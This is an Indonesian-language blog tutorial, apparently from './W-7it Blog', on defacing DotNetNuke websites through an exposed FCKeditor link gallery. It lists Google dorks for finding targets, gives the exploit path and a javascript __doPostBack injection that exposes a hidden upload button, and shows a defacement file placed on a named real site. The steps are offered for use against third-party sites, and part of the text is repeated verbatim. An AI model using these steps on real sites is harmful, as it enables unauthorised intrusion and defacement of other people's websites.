Oke, langsung saja.
Google Dork :
- inurl:"/portals/0"
- inurl:fcklinkgallery.aspx
Exploit : Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Pertama, cari target di google dengan dork di atas. Nyarinya harus sabar. Dan ternyata alamat yang kita temukan adalah http://www.caslpo.com/Portals/0/kotek.xml
Kedua, masukkan exploitnya dimulai dari portals/0/ . Sehingga menjadi http://www.caslpo.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Nanti akan menjadi seperti ini :
Lalu pilih file. Hapus url di address bar dan ganti dengan script berikut javascript:__doPostBack('ctlURL$cmdUpload','')
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile
Sehinga hasil deface saya terletak di :
http://www.caslpo.com/portals/0/jkt.txt
Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.
Maka akan muncul tombol upload. Klik tombol tersebut. Pilih file yang akan diupload. Sebagai contoh, saya upload file dengan nama jkt.txt . Lalu pilih Upload Selected File .
Tunggu proses upload selesai. Dan letak hasil deface kalian ada di http://situs/portals/0/namafile
Sehinga hasil deface saya terletak di :
http://www.caslpo.com/portals/0/jkt.txt
Bagaimana ? Mudah kan ? Jika ada yang kurang jelas, silahkan bertanya di kotak komentar.
- NB : Ekstensi file yang bisa di upload adalah : swf, jpg, jpeg, JPE, gif, bmp, png, doc, xls, ppt, pdf, txt, xml, xsl, css, zip, 3gp, asf, asx, avi, flv, m4v, mov, mp4, mpe, mpeg, mpg, ram, rm, rmvb, wm, wmv, vob . Kalian tidak bisa upload shell php !
Para pengurus ./W-7it Blog Tidak selalu Online untuk memantau Komentar yang Masuk, Jadi tolong berikan Komentar Anda dengan Pantas dan Layak dikonsumsi oleh Publik. No SARA, SPAM dan Sejenisnya.